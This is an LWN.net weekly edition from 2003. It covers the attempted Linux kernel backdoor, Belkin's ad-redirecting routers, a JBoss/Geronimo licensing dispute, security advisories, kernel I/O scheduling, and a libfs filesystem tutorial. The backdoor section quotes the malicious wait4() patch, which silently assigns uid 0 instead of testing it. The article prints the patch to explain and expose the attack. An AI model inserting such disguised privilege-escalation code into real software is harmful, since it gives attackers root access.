LWN.net Weekly Edition for November 13, 2003
The upcoming security fight
Security is an important issue. Software users have been bitten by enough security incidents now that they are beginning to really think about whether a system they are considering deploying is sufficiently secure or not. As a result, software vendors are beginning to feel some heat from their customers on security. Among other things, security concerns have led directly to two new initiatives from Microsoft: the payment of bounties on information leading to the arrest of virus authors, and (apparently) an upcoming publicity campaign which will try to demonstrate that Microsoft products have a better security record than Linux.Strangely enough, neither of those efforts will make Windows more secure in any way. But they will raise the stakes with regard to security issues. We should expect that, in the future, Linux-related security problems will receive much more attention than they have in the past. If Microsoft is out to prove itself more secure than Linux, it certainly will not waste any PR opportunities resulting from Linux vulnerabilities.
There are many implications to note from an increased emphasis on the perceived security of software products. Both developers and users of free software will want to redouble their efforts to tighten up security. The free software community may be better at the creation and deployment of secure software than just about anybody else, but our record is still far from good enough.
There is nothing new in the statement above. But consider for a moment the recent attempt to insert a backdoor into the Linux kernel. There is no way of knowing who was responsible for that attack, but it is worth thinking about who might have benefitted from it. The attempted back door - which did not enable remote attacks - would have been more useful for publicity than for actual exploits. Somebody wanted to be able to say that a vulnerability had been successfully planted in the Linux kernel. Any company with an interest in attacking the security record of free software - and there is more than one such company - would have gotten great mileage out of this kind of demonstration. It is safe to assume that there will be other attempts to insert malicious code into free software releases; a high level of vigilance will be required to detect and defeat those attempts.
The public perception of the relative security of operating systems has become an issue that means real money to the companies involved. When free software starts to eat too far into its competitors' bottom line, those competitors can be expected to fight back. Not all of them will choose to fight fairly; a quick look at the SCO case will verify that fact. Without giving in to absolute paranoia, we should expect the debate around security issues to take on a harsher edge. Things could get interesting, but this is a fight we should win decisively by doing what we always do: developing the best software we can with our users' needs in mind.
An attempt to backdoor the kernel
The mainline 2.4 and 2.6.0-test kernels are both currently maintained in BitKeeper repositories. As a service for those who, for whatever reason, are unable or unwilling to use BitKeeper, however, the folks at BitMover have set up a separate CVS repository. That repository contains the current code and the full revision history. It is not, however, the place where new changes are committed. So, when somebody managed to push some changes directly into CVS, Larry McVoy noticed quickly.Over the years, people have had numerous things to say about BitKeeper and the people behind it. Nobody, however, has accused them of being insufficiently careful. Every change in the CVS repository includes backlink information tying it to the equivalent BitKeeper changesets. The changes in question lacked that information, and thus stood out immediately.
An attempt to make a change in this way is suspicious, to say the least, so there was a lot of interest in what the attempted change was. The actual patch confirmed all suspicions; the relevant code was:
+ if ((options == (__WCLONE|__WALL)) && (current->uid = 0)) + retval = -EINVAL;
It looks much like a standard error check, until you notice that the code is not testing current->uid - it is, instead setting it to zero. A program which called wait4() with the given flags set would, thereafter, be running as root. This is, in other words, a classic back door.
The resulting vulnerability, had it ever made it to a deployed system, would have been a locally-exploitable hole. Some sites have said that the hole would have been susceptible to remote exploits, but that is not the case. An attacker would need to be able to run a program on the target system first.
But this attack never had any chance of corrupting the mainline kernel. The CVS repository is generated from BitKeeper, it is not a path for patches to get into the BitKeeper repositories. So the code in question could only affect users who were working from the CVS repository. Kernels used by distributors probably do not come from that repository, and, as this incident has shown, illicit code can only remain there for so long before being detected.
As it turns out, a successful attack on the public BitKeeper repositories would not be a whole lot more effective. By its nature, BitKeeper works with many copies of the repository; it is good for BitKeeper users that disk space is cheap. The public 2.6 repository reflects all of Linus's work, but it is not his repository. When Linus applies a set of patches, he has to explicitly "push" his private repository to the public server before the rest of the world sees it.
BitKeeper takes a very paranoid view of its data. Checksums are applied all over the place, and a push from one repository to another can't be done if the receiving repository has unknown changesets in it. So, if somebody were to sneak something into the public repository, Linus would notice it the next time he attempted a push of his own. At that point the red alert could be sounded, and the only people affected would be those who had pulled development kernels directly from the repository.
So the only way to get a back door into the kernel source - and to have it be widely distributed - would be to get Linus or one of his top-tier lieutenants to accept it directly. That would be a challenge, since these people do actually look over code before accepting it. It is not entirely impossible, however; a forged message to Linus appearing to contain a patch from a trusted contributor might just be accepted. The development process is reasonably secure, but not perfect.
For this reason, this episode has renewed a push to incorporate digital signature checking into BitKeeper. If the source management system checked such signatures automatically, the most obvious forgeries would be detected before they were merged. Larry McVoy has indicated that he is willing to build such a feature into the free (beer) version of BitKeeper. Whether the key kernel hackers would be willing to start signing all of their patches is another question. The pain of having to sign patches could well be far less than the pain of dealing with a widely distributed backdoor in the kernel, however.
The Belkin router fiasco
It must have seemed like a good idea to some marketing person at Belkin. This company offers a "parental control" feature in it LAN router products which, upon payment of a subscription fee, allow control over which sites can be accessed. It would be nice (from Belkin's point of view) to be sure that all customers are aware of the opportunity to buy this service. So why not just redirect a random web connection every eight hours and have it display an ad for the parental control service rather than the page the user thought they were going to see?Belkin thought this "feature" was not a particularly big deal. After all, it can be turned off by changing a setting in the router configuration. Or, if the user hits the "no thanks" button, a system owned by Belkin will connect to the router over the net and turn off the feature for them. Unless, of course, the router sits behind a firewall that might look askance at connects to internal routers from the wider Internet.
This sort of episode demonstrates, again, why it is important to have our gadgets powered by free software. Nobody should have to put up with a router hijacking their HTTP connections to display advertisements at them. Few of us want a router whose configuration can be silently changed via a connection from the outside. And many of us would sure like to know what other interesting "features" might have been included with such a product. But, without the source, there is very little to be done. Bad (or malicious) features cannot be fixed, and nobody can audit the code for any other surprises that may be lurking within.
In the absence of source, there is only one feasible way to fix a problem like Belkin's advertising feature: embarrass the manufacturer on the net until they make a fix available. In this case, that approach appears to have worked; Belkin has announced that it will be releasing a firmware update which removes the redirect feature. But we may never know what other features Belkin will have worked into its products. Until our gadgets are powered by free software, we will never really know what our appliances are doing and we will lack the power to fix them.
Geronimo accused of LGPL violations
Geronimo is a project being run under the Apache Software Foundation; it is an attempt to create a free J2EE implementation under the Apache license. As such, it is a direct competitor to JBoss, a commercially-supported project which licenses its code under the Lesser GPL. The JBoss Group has evidently been sufficiently concerned about Geronimo to be watching the project and digging through its code repository. They didn't like what they found; on November 10, the Apache Software Foundation received a letter (PDF format) from JBoss's lawyers alleging that code had been copied from JBoss into Geronimo.Copying of code between free software projects is not always a concern; indeed, the freedom to do so is one of the things that makes free software great. This copying cannot happen, however, if the two projects do not have compatible licenses. The JBoss code is licensed under the LGPL; creating a derived product of that code under the Apache license is not an action that the LGPL allows. So, if this copying has actually occurred, and the person contributing the code to Geronimo did not have the right to do so (by actually owning the copyright on that code, for example), the JBoss Group may have a real point.
It would have been nice to resolve this issue without bringing in the lawyers. Even so, the tone of the letter distinguishes the JBoss group from other companies which have been claiming that their code was copied. The letter proceeds on the assumption that any such copying was not done intentionally, and it provides some actual code examples. The Geronimo project has responded accordingly; if there is any LGPL code in Geronimo, they don't want it there and they will take the appropriate steps to get rid of it.
Thus far, however, the Geronimo developers seem unconvinced by the JBoss Group's claims. An examination of the examples provided by JBoss suggests that the code in question may have a right to be there. Indeed, some of it appears to be derived from other Apache-licensed code which somehow lost its copyright notices on its way into JBoss. One of the code examples is no longer in the current Geronimo code base, and has not been for a couple of months.
This is a situation which bears watching. The free software community truly does not need a legal battle between two of its projects. It does appear that the right things are being done, however; with luck, this situation will be resolved in a friendly and professional manner, and without further involvement of lawyers.
Security
Brief items
Security Certification - The Open Source Way
An open approach was used in the first ever security certification for Linux, as befits the open source nature of the operating system. IBM and SuSE teamed up to certify SuSE Linux Enterprise Server 8 (SLES 8) on IBM eServer xSeries hardware and achieved Common Criteria Evaluation Assurance Level 2+ (EAL2+) in July. Much of the documentation that was done to accomplish this is available from the SuSE and IBM Linux Technology Center web sites."This very open approach is unusual for a certification," according to Klaus Weidner, senior IT security consultant for atsec, the German firm responsible for the evaluation. "The overall effort for another distribution is significantly lower if they re-use the material that has been released to the Open Source community from the evaluation of SLES 8," he said. The material that has been released includes a high-level design, a security guide, the security target, test plans, and the certification report. In addition, bugs found during the process have been fixed and the resulting patches fed back to the developers for inclusion in upcoming releases.
Common Criteria security certification consists of two elements: the "security target" (or "protection profile") that specifies the security features of the product to be evaluated and the "assurance level" which provides a level of confidence that the security functions perform as documented. For the EAL2 certification, the security target was created by IBM and SuSE. The evaluation process looked at SuSE's "configuration management, acceptance procedures and development security," Weidner said, and SuSE was "found to meet and exceed all requirements for this evaluation." A few bugs were found in the testing process, particularly in PAM authentication, and they were fixed and funneled back to the development community.
Looking forward, the evaluation and testing for an EAL3 certification is currently under way using the Controlled Access Protection Profile (PDF format) (CAPP), which is a standardized security target created by the NSA. CAPP is the target that was used by Microsoft to achieve an EAL4 certification for Windows 2000. These certifications are widely seen by companies and government agencies as a seal of approval for the security functions of a product.
The main areas that need work for the EAL3 certification are adding an auditing subsystem and documenting what Weidner called "security-relevant subsystem interfaces". As part of that process, any undocumented Linux system calls need to have man pages written for them; the resulting pages will, of course, be provided back to the Linux community. The audit subsystem has been completed and is undergoing tests, the kernel portion is based on the systrace patch along with a set of user-space utilities that were developed by IBM and SuSE. These too will be open source.
EAL4 certification (should IBM and SuSE take that step) will require even more documentation, including internal interfaces inside the kernel. "Kernel hackers may be happy with using the source code as a reference, but EAL4 requires a descriptive low-level design document," Weidner said. This effort would be huge and it is not known whether it will be done, but it would obviously serve as a great reference to kernel internals.
One of the bigger questions surrounding these certifications is what they really mean for the security of the system. Unfortunately, the answer seems to be: not much. Professor Jonathan Shapiro of Johns Hopkins University has an analysis of the Windows 2000 EAL4 certification and much of what he says can be applied to the EAL2 (and presumably upcoming EAL3) certification of SLES 8. In summary the CAPP (and the target used for EAL2) both define away most of the "real world" security problems that operating systems face. From the CAPP document:
which Shapiro translates into:
While CAPP is the "standard", it really does not provide requirements that would make a system secure from the biggest security threats that exist today. It seems somewhat unlikely that the cracker community is particularly well funded, but they certainly are hostile, clever, and persistent. Given the volume of exploits against the CAPP/EAL4 certified Windows 2000, it seems clear that certification is mostly a marketing bullet point to make purchasers more comfortable without actually providing a secure system.
Where are the Fedora updates?
Some users of the Fedora Core 1 release have noted that it contains at least one package (ethereal) with a known vulnerability and have asked when security updates will become available. The response from Red Hat is:
The first update (for EPIC) has found its way to the download directory, and the ethereal update is in the testing directory. Announcements will go to the fedora-announce list soon. Fedora Core is a new distribution, and some of the mechanisms are still going into place, but it should all be there before too long.
New vulnerabilities
conquest: buffer overflow
| Package(s): | conquest | CVE #(s): | CAN-2003-0933 | ||||
| Created: | November 10, 2003 | Updated: | November 13, 2003 | ||||
| Description: | Steve Kemp discovered a buffer overflow in the environment variable handling of conquest, a curses based, real-time, multi-player space warfare game, which could lead a local attacker to gain unauthorized access to the group conquest. | ||||||
| Alerts: |
| ||||||
epic4: buffer overflow
| Package(s): | epic4 | CVE #(s): | CAN-2003-0328 | ||||||||||||
| Created: | November 10, 2003 | Updated: | November 25, 2003 | ||||||||||||
| Description: | Jeremy Nelson discovered a remotely exploitable buffer overflow in EPIC4, a popular client for Internet Relay Chat (IRC). A malicious server could craft a reply which triggers the client to allocate a negative amount of memory. This could lead to a denial of service if the client only crashes, but may also lead to executing of arbitrary code under the user id of the chatting user. | ||||||||||||||
| Alerts: |
| ||||||||||||||
ethereal: multiple remote and local vulnerabilities
| Package(s): | ethereal | CVE #(s): | CAN-2003-0925 CAN-2003-0926 CAN-2003-0927 | ||||||||||||||||||||
| Created: | November 10, 2003 | Updated: | December 17, 2003 | ||||||||||||||||||||
| Description: | Multiple vulnerabilities have been found in ethereal versions below 0.9.16. Remote attackers can craft packets, and local users can build corrupt trace files, resulting denial of service and remote code execution. | ||||||||||||||||||||||
| Alerts: |
| ||||||||||||||||||||||
hylafax: remote code execution
| Package(s): | hylafax | CVE #(s): | CAN-2003-0886 | ||||||||||||||||||||
| Created: | November 10, 2003 | Updated: | November 20, 2003 | ||||||||||||||||||||
| Description: | Hylafax is an Open Source fax server which allows sharing of fax equipment among computers by offering its service to clients by a protocol similar to FTP. The SuSE Security Team found a format bug condition during a code review of the hfaxd server. It allows remote attackers to execute arbitrary code as root. However, the bug can not be triggered in hylafax's default configuration. The "capi4hylafax" packages also need to be updated as a dependency where they are available. Upgrading to version 4.1.8 fixes the problem; see this advisory for details. | ||||||||||||||||||||||
| Alerts: |
| ||||||||||||||||||||||
mpg123: heap overflow
| Package(s): | mpg123 | CVE #(s): | CAN-2003-0865 | ||||||||||||
| Created: | November 12, 2003 | Updated: | February 19, 2004 | ||||||||||||
| Description: | Versions of mpg123 through 0.59s contain a heap overflow which may be exploited remotely (by a hostile server). See this advisory for details. | ||||||||||||||
| Alerts: |
| ||||||||||||||
omega-rpg: buffer overlow
| Package(s): | omega-rpg | CVE #(s): | CAN-2003-0932 | ||||
| Created: | November 11, 2003 | Updated: | November 13, 2003 | ||||
| Description: | Steve Kemp discovered a buffer overflow in the commandline and environment variable handling of omega-rpg, a text-based rogue-style game of dungeon exploration, which could lead a local attacker to gain unauthorized access to the group games. | ||||||
| Alerts: |
| ||||||
Resources
Secure programmer: Validating input (IBM developerWorks)
David A. Wheeler writes about validating input in this installment of the Secure Programmer, on IBM developerWorks. "One of the biggest mistakes developers of secure programs make is to try to check for 'illegal' data values. It's a mistake because attackers are quite clever; they can often think of yet another dangerous data value. Instead, determine what is legal, check if the data matches that definition, and reject anything that doesn't match that definition. For security it's best to be extremely conservative to start with, and allow just the data that you know is legal. After all, if you're too restrictive, users will quickly report that the program won't allow legitimate data to be entered. On the other hand, if you're too permissive, you may not find that out until after your program has been subverted."
Page editor: Jonathan Corbet
Kernel development
Brief items
Kernel release status
The current development kernel remains 2.6.0-test9, as it has been since October 25. The slow, steady accumulation of patches (all relatively important fixes) in Linus's BitKeeper repository continues, however. One of those patches disables the IDE tagged command queueing feature, since it does not look like that code will be sufficiently stable by the 2.6.0 release.The current stable kernel is 2.4.22; Marcelo announced the first 2.4.23 release candidate on November 10. The time has come for testing of this release to help ensure a solid 2.4.23 kernel in the near future.
Kernel development news
Disk I/O priorities
Linux has long had a priority mechanism which controls access to the processor(s). Other system resources, however, are not so easily managed. Often, the real performance bottleneck is not the processor, but some other resource, such as I/O bandwidth to a disk drive. If disk I/O is the real limiting factor, even a very low-priority process can, by creating many I/O requests, strongly affect the performance of higher-priority processes on the system.Jens Axboe has now taken a stab at the I/O priority issue with a new version of his "completely fair queueing" (CFQ) I/O scheduler. We first mentioned the CFQ scheduler back in February; it works by creating a separate request queue for every process issuing disk I/O and taking an equal number of requests from each one of them. In this way, it seeks to distribute the available I/O bandwidth equally across processes in the system and produce "completely fair" results.
The new version gives each process an I/O priority, which is a number between zero and 20 (inclusive). At the bottom end, disk I/O is only allowed when the disk would otherwise be idle. A priority of 20, instead, is the "real-time" level; all requests at that level are satisfied before any other requests are considered. The levels in between are for normal processes; by default, the I/O priority is set to 10. A pair of system calls has been added to adjust the I/O priority of a process, though the form of those calls is likely to change in the future.
Internally, the per-process request queues have now been divided into an array of 21 lists, one for each priority level. There is also a dispatch queue, which contains the requests which have been selected for processing next. A separate dispatch queue is still needed to allow some amount of request ordering and merging.
When the time comes to fill the dispatch queue, the new scheduler starts with the real-time queue. If requests are waiting there, they go straight into the dispatch queue and the process is complete. There is also an anticipatory scheduling feature for real-time requests: when the last real-time request is processed, the scheduler will wait a short period (10ms, currently) to see if any more real-time requests show up before opening the floodgates for everybody else.
In the absence of real-time requests, the code passes through each priority level, taking a decreasing number of requests from each one. Each process gets to contribute one request at a time to the dispatch queue until the quota for its priority level (expressed in both the number of requests and the number of sectors to transfer) has been reached. Requests are only taken from the idle priority queue if no other requests have been dispatched for a configurable period of time (default 100ms).
With the new CFQ scheduler, an I/O request may not be serviced even after it makes it into the dispatch queue. If a new request with real-time priority shows up, all lower-priority requests are yanked back out of the dispatch queue and have to go through the whole process again. Similarly, any non-idle requests will cause any pending idle-priority requests to lose their place in the dispatch queue.
The new scheduler appears to be uncontroversial - though it clearly is not a critical fix and thus won't go into 2.6.0. The real debate appears to be over how I/O priorities should be controlled. Some commenters would like to see the nice() system call apply to I/O priorities as well as CPU priorities. That, however, would be a fairly fundamental ABI change, and is unlikely to happen.
On the proper use of vmalloc()
As those who have looked at kernel programming at all have noticed, there are two basic memory allocation modes in Linux. One of those, which comes down to get_free_pages() in the end, allocates one or more physically contiguous pages which are in the kernel's main virtual address space (except for high memory pages, of course). Most other memory allocation mechanisms, including the slab allocator and kmalloc(), are built on top of get_free_pages(). In the other corner is vmalloc(), which allocates virtually contiguous (but physically dispersed) pages in a separate virtual address space. vmalloc() is relatively slow, but it can perform large allocations that look contiguous to the kernel. It is thus used, for example, to allocate space for code from loadable modules.Erik Jacobson recently found the limits of kmalloc() while querying /proc/interrupts on a very large system. The code implementing /proc/interrupts attempts to allocate a buffer for its output; the size of that buffer is dependent on the number of processors on the system. On big systems, the required buffer is large and the allocation fails. So Erik submitted a fix which uses vmalloc() to allocate the memory instead.
Linus didn't like it. He pointed out that the seq_file interface should be used instead. Indeed, /proc/interrupts fits naturally into the sort of output seq_file is intended to create, and doing things that way can eliminate the need to allocate a large buffer at all. But Linus also clarified his thoughts on when vmalloc() should be used:
That should be sufficiently clear for most readers; perhaps an entry on vmalloc() needs to be added to the coding style document.
There are a few reasons for this stance. Every call to vmalloc() requires page table tweaking and translation buffer flushes, so it will be slow. Space from vmalloc() lies outside of the regular kernel range, which is (on most architectures) covered by a single, large page table entry, so extra translation buffer slots are required to access it. And, on many architectures, the amount of virtual space set aside for vmalloc() is relatively small. For all of these reasons, use of vmalloc() is discouraged, and patches containing vmalloc() calls are increasingly unlikely to make it into the kernel.
Accessing the BK2CVS repository
The BK2CVS repository (which contains a CVS copy of Linus's public BitKeeper repository) has been offline for a bit due to the backdoor insertion attempt. When it returns, it may come back without the "pserver" access mode which is normally used for anonymous CVS updates. Pserver is convenient, but it increases the security exposure of the CVS repository and it is not supported by the kernel.org mirror system. Given that a very small number of people have been using that access mode, there seems to be a consensus that it can just go away.People do use the CVS repository, however. It just turns out that many of them have noted that it is faster to use rsync to update the entire repository from a kernel.org mirror than to update it through CVS. The rsync approach looks like the way to go in the future, but it does have one potential difficulty: if the repository is updated in the middle of an rsync, the person downloading the copy might get an inconsistent tree. Kernel hackers have to deal with enough race conditions as it is; they would prefer not to encounter them while trying to update their copy of the mainline kernel repository.
The solution that is likely to be implemented involves the creation of a couple of sequence files. One is fetched before doing the big repository rsync, and the other afterward. If the sequence numbers in the two files do not match, the rsync operation raced with an update of the repository and needs to be retried. This is, of course, an Internet implementation of the seqlock algorithm used within the kernel. Look for an update script to show up soon.
Driver porting
News from the driver porting series
The LWN Porting Drivers to 2.6 series is currently going through an extensive review. Since the first set of articles came out last February, quite a few things have changed and a number of the articles have become a little stale. Trying to keep up with the kernel is like that... The updating process is a little over halfway complete as of this writing; we should be able to finish within a week or so.Most of the articles require only small changes at most. The "creating virtual filesystems with libfs" article, however, has been significantly expanded, thanks to the addition of simple_fill_super(). For those who are curious, the newer, bigger version of the article appears below.
Creating Linux virtual filesystems
| This article is part of the LWN Porting Drivers to 2.6 series. |
Linus and numerous other kernel developers dislike the ioctl() system call, seeing it as an uncontrolled way of adding new system calls to the kernel. Putting new files into /proc is also discouraged, since that area is seen as being a bit of a mess. Developers who populate their code with ioctl() implementations or /proc files are often encouraged to create a standalone virtual filesystem instead. Filesystems make the interface explicit and visible in user space; they also make it easier to write scripts which perform administrative functions. But the writing of a Linux filesystem can be an intimidating task. A developer who has spent some time just getting up to speed on the driver interface can be forgiven for balking at having to learn the VFS API as well.
The 2.6 kernel contains a set of routines called "libfs" which is designed to make the task of writing virtual filesystems easier. libfs handles many of the mundane tasks of implementing the Linux filesystem API, allowing non-filesystem developers to concentrate (mostly) on the specific functionality they want to provide. What it lacks, however, is documentation. This article is an attempt to fill in that gap a little bit.
The task we will undertake is not particularly ambitious: export a simple filesystem (of type "lwnfs") full of counter files. Reading one of these files yields the current value of the counter, which is then incremented. This leads to the following sort of exciting interaction:
# cat /lwnfs/counter
0
# cat /lwnfs/counter
1
# ...
Your author was able to amuse himself well into the thousands this way; some users may tire of this game sooner, however. The impatient can get to higher values more quickly by writing to the counter file:
# echo 1000 > /lwnfs/counter
# cat /lwnfs/counter
1000
#
OK, so the Linux distributors will probably not get to excited about advertising the new "lwnfs" capability. But it works as a way of showing how to create virtual filesystems. For those who are interested, the full source is available.
Initialization and superblock setup
So let's get started. A loadable module which implements a filesystem must, at load time, register that filesystem with the VFS layer. The lwnfs module initialization code is simple:
static int __init lfs_init(void)
{
return register_filesystem(&lfs_type);
}
module_init(lfs_init);
The lfs_type argument is a structure which is set up as follows:
static struct file_system_type lfs_type = {
.owner = THIS_MODULE,
.name = "lwnfs",
.get_sb = lfs_get_super,
.kill_sb = kill_litter_super,
};
This is the basic data structure which describes a filesystem type to the kernel; it is declared in <linux/fs.h>. The owner field is used to manage the module's reference count, preventing unloading of the module while the filesystem code is in use. The name is what eventually ends up on a mount command line in user space. Then there are two functions for managing the filesystem's superblock - the root of the filesystem data structure. kill_litter_super() is a generic function provided by the VFS; it simply cleans up all of the in-core structures when the filesystem is unmounted; authors of simple virtual filesystems need not worry about this aspect of things. (It is necessary to unregister the filesystem at unload time, of course; see the source for the lwnfs exit function).
In many cases, the creation of the superblock must be done by the filesystem programmer -- but see the "a simpler way" section below. This task involves a bit of boilerplate code. In this case, lfs_get_super() hands off the task as follows:
static struct super_block *lfs_get_super(struct file_system_type *fst,
int flags, const char *devname, void *data)
{
return get_sb_single(fst, flags, data, lfs_fill_super);
}
Once again, get_sb_single() is generic code which handles much of the superblock creation task. But it will call lfs_fill_super(), which performs setup specific to our particular little filesystem. It's prototype is:
static int lfs_fill_super (struct super_block *sb,
void *data, int silent);
The in-construction superblock is passed in, along with a couple of other arguments that we can ignore. We do have to fill in some of the superblock fields, though. The code starts out like this:
sb->s_blocksize = PAGE_CACHE_SIZE; sb->s_blocksize_bits = PAGE_CACHE_SHIFT; sb->s_magic = LFS_MAGIC; sb->s_op = &lfs_s_ops;
Most virtual filesystem implementations have something that looks like this; it's just setting up the block size of the filesystem, a "magic number" to recognize superblocks by, and the superblock operations. These operations need not be written for a simple virtual filesystem - libfs has the stuff that is needed. So lfs_s_ops is defined (at the top file level) as:
static struct super_operations lfs_s_ops = {
.statfs = simple_statfs,
.drop_inode = generic_delete_inode,
};
Creating the root directory
Getting back into lfs_fill_super(), our big remaining task is to create and populate the root directory for our new filesystem. The first step is to create the inode for the directory:
root = lfs_make_inode(sb, S_IFDIR | 0755); if (! root) goto out; root->i_op = &simple_dir_inode_operations; root->i_fop = &simple_dir_operations;
lfs_make_inode() is a boilerplate function that we will look at eventually; for now, just assume that it returns a new, initialized inode that we can use. It needs the superblock and a mode argument, which is just like the mode value returned by the stat() system call. Since we passed S_IFDIR, the returned inode will describe a directory. The file and directory operations that we assign to this inode are, again, taken from libfs.
This directory inode must be put into the directory cache (by way of a "dentry" structure) so that the VFS can find it; that is done as follows:
root_dentry = d_alloc_root(root); if (! root_dentry) goto out_iput; sb->s_root = root_dentry;
Creating files
The superblock now has a fully initialized root directory. All of the actual directory operations will be handled by libfs and the VFS layer, so life is easy. What libfs cannot do, however, is actually put anything of interest into that root directory – that's our job. So the final thing that lfs_fill_super() does before returning is to call:
lfs_create_files(sb, root_dentry);
In our sample module, lfs_create_files() creates one counter file in the root directory of the filesystem, and another in a subdirectory. We'll look mostly at the root-level file. The counters are implemented as atomic_t variables; our top-level counter (called, with great imagination, "counter") is set up as follows:
static atomic_t counter;
static void lfs_create_files (struct super_block *sb,
struct dentry *root)
{
/* ... */
atomic_set(&counter, 0);
lfs_create_file(sb, root, "counter", &counter);
/* ... */
}
lfs_create_file does the real work of making a file in a directory. It has been made about as simple as possible, but there are still a few steps to be performed. The function starts out as:
static struct dentry *lfs_create_file (struct super_block *sb,
struct dentry *dir, const char *name,
atomic_t *counter)
{
struct dentry *dentry;
struct inode *inode;
struct qstr qname;
Arguments include the usual superblock structure, and dir, the dentry for the directory that will contain this file. In this case, dir will be the root directory we created before, but it could be any directory within the filesystem.
Our first task is to create a directory entry for the new file:
qname.name = name; qname.len = strlen (name); qname.hash = full_name_hash(name, qname.len); dentry = d_alloc(dir, &qname);
The setting up of qname just hashes the file name so that it can be found quickly in the dentry cache. Once that's done, we create the entry within our parent dir. The file also needs an inode, which we create as follows:
inode = lfs_make_inode(sb, S_IFREG | 0644); if (! inode) goto out_dput; inode->i_fop = &lfs_file_ops; inode->u.generic_ip = counter;
Once again, we call lfs_make_inode (which we will look at shortly, honest), but this time we use it to create a regular file. The key to the creation of special-purpose files in virtual filesystems is to be found in the other two assignments:
- The i_fop field is set up with our file operations which will
actually implement reads and writes on the counter.
- We use the u.generic_ip pointer in the inode to stash aside a pointer to the atomic_t counter associated with this file.
In other words, i_fop defines the behavior of this particular file, and u.generic_ip is the file-specific data. All virtual filesystems of interest will make use of these two fields to set up the required behavior.
The last step in creating a file is to add it to the dentry cache:
d_add(dentry, inode); return dentry;
Putting the inode into the dentry cache allows the VFS to find the file without having to consult our filesystem's directory operations. And that, in turn, means our filesystem does not need to have any directory operations of interest. The entire structure of our virtual filesystem lives in the kernel's cache structure, so our module need not remember the structure of the filesystem it has set up, and it need not implement a lookup operation. Needless to say, that makes life easier.
Inode creation
Before we get into the actual implementation of the counters, it's time to look at lfs_make_inode(). The function is pure boilerplate; it looks like:
static struct inode *lfs_make_inode(struct super_block *sb, int mode)
{
struct inode *ret = new_inode(sb);
if (ret) {
ret->i_mode = mode;
ret->i_uid = ret->i_gid = 0;
ret->i_blksize = PAGE_CACHE_SIZE;
ret->i_blocks = 0;
ret->i_atime = ret->i_mtime = ret->i_ctime = CURRENT_TIME;
}
return ret;
}
It simply allocates a new inode structure, and fills it in with values that make sense for a virtual file. The assignment of mode is of interest; the resulting inode will be a regular file or a directory (or something else) depending on how mode was passed in.
Implementing file operations
Up to this point, we have seen very little that actually makes the counter files work; it's all been VFS boilerplate so that we have a little filesystem to put those counters into. Now the time has come to see how the real work gets done.The operations on the counters themselves are to be found in the file_operations structure that we associate with the counter file inodes:
static struct file_operations lfs_file_ops = {
.open = lfs_open,
.read = lfs_read_file,
.write = lfs_write_file,
};
A pointer to this structure, remember, was stored in the inode by lfs_create_file().
The simplest operation is open():
static int lfs_open(struct inode *inode, struct file *filp)
{
filp->private_data = inode->u.generic_ip;
return 0;
}
The only thing this function need do is copy the pointer to the atomic_t pointer over into the file structure, which makes it a bit easier to get at.
The interesting work is done by the read() function, which must increment the counter and return its value to the user space program. It has the usual read() operation prototype:
static ssize_t lfs_read_file(struct file *filp, char *buf,
size_t count, loff_t *offset)
It starts by reading and incrementing the counter:
atomic_t *counter = (atomic_t *) filp->private_data; int v = atomic_read(counter); atomic_inc(counter);
This code has been simplified a bit; see the module source for a couple of grungy, irrelevant details. Some readers will also notice a race condition here: two processes could read the counter before either increments it; the result would be the same counter value returned twice, with certain dire results. A serious module would probably serialize access to the counter with a spinlock. But this is supposed to be a simple demonstration.
So anyway, once we have the value of the counter, we have to return it to user space. That means encoding it into character form, and figuring out where and how it fits into the user-space buffer. After all, a user-space program can seek around in our virtual file.
len = snprintf(tmp, TMPSIZE, "%d\n", v); if (*offset > len) return 0; if (count > len - *offset) count = len - *offset;
Once we've figured out how much data we can copy back, we just do it, adjust the file offset, and we're done.
if (copy_to_user(buf, tmp + *offset, count)) return -EFAULT; *offset += count; return count;
Then, there is lfs_write_file(), which allows a user to set the value of one of our counters:
static ssize_t lfs_write_file(struct file *filp, const char *buf,
size_t count, loff_t *offset)
{
atomic_t *counter = (atomic_t *) filp->private_data;
char tmp[TMPSIZE];
if (*offset != 0)
return -EINVAL;
if (count >= TMPSIZE)
return -EINVAL;
memset(tmp, 0, TMPSIZE);
if (copy_from_user(tmp, buf, count))
return -EFAULT;
atomic_set(counter, simple_strtol(tmp, NULL, 10));
return count;
}
That is just about it. The module also defines lfs_create_dir, which creates a directory in the filesystem; see the full source for how that works.
A simpler way
The above example contains a great deal of scary-looking boilerplate code. That boilerplate will be necessary for many applications, but there is a shortcut that will work for many others. If you know at compile time which files you wish to create, and you do not need to make subdirectories, read on for the easier way.In this section, we'll talk about a different version of the lwnfs module - one which eliminates about 1/3 of the code. It implements a simple array of four counters, with no subdirectories. Once again, full source is available if you are interested.
Above, we looked at a function called lfs_fill_super(), which fills in the filesystem superblock, creates the root directory, and populates it with files. In the simpler version, the entire function becomes the following:
static int lfs_fill_super(struct super_block *sb, void *data, int silent)
{
return simple_fill_super(sb, LFS_MAGIC, OurFiles);
}
simple_fill_super() is a libfs function which does almost everything we need. Its actual prototype is:
int simple_fill_super(struct super_block *sb, int magic,
struct tree_descr *files);
The struct super_block argument can be passed directly through, and magic is the same magic number we saw above. The files argument describes which files should be created in the filesystem; the relevant structure is defined as follows:
struct tree_descr {
char *name;
struct file_operations *ops;
int mode;
};
The arguments should be fairly obvious by now; each structure gives the name of the file to be created, the file operations to associate with the file, and the protection bits for the file. There are, however, a couple of quirks about how the array of tree_descr structures should be built:
- Entries which are filled with NULLs (more strictly, where
name is NULL) are simply ignored. Do not try to end
the list with a NULL-filled structure, unless you like
decoding oops listings.
- The list is terminated, instead, by an entry that sets name
to the empty string.
- The entries correspond directly to the inode numbers which will be assigned to the resulting files. This knowledge can be used to figure out, in the file operations code, which file is being opened. But this feature also implies that the first entry in the list cannot be used, since the filesystem root directory will take inode zero. So, when you create your tree_descr list, the first entry should be NULL.
Having painfully learned all of the above, your author has set up the list for the four "counter" files as follows:
static struct tree_descr OurFiles[] = {
{ NULL, NULL, 0 }, /* Skipped */
{ .name = "counter0", /* Inode 1 */
.ops = &lfs_file_ops,
.mode = S_IWUSR|S_IRUGO },
{ .name = "counter1", /* Inode 2 */
.ops = &lfs_file_ops,
.mode = S_IWUSR|S_IRUGO },
{ .name = "counter2", /* Inode 3 */
.ops = &lfs_file_ops,
.mode = S_IWUSR|S_IRUGO },
{ .name = "counter3", /* Inode 4 */
.ops = &lfs_file_ops,
.mode = S_IWUSR|S_IRUGO },
{ "", NULL, 0 } /* Terminates the list */
};
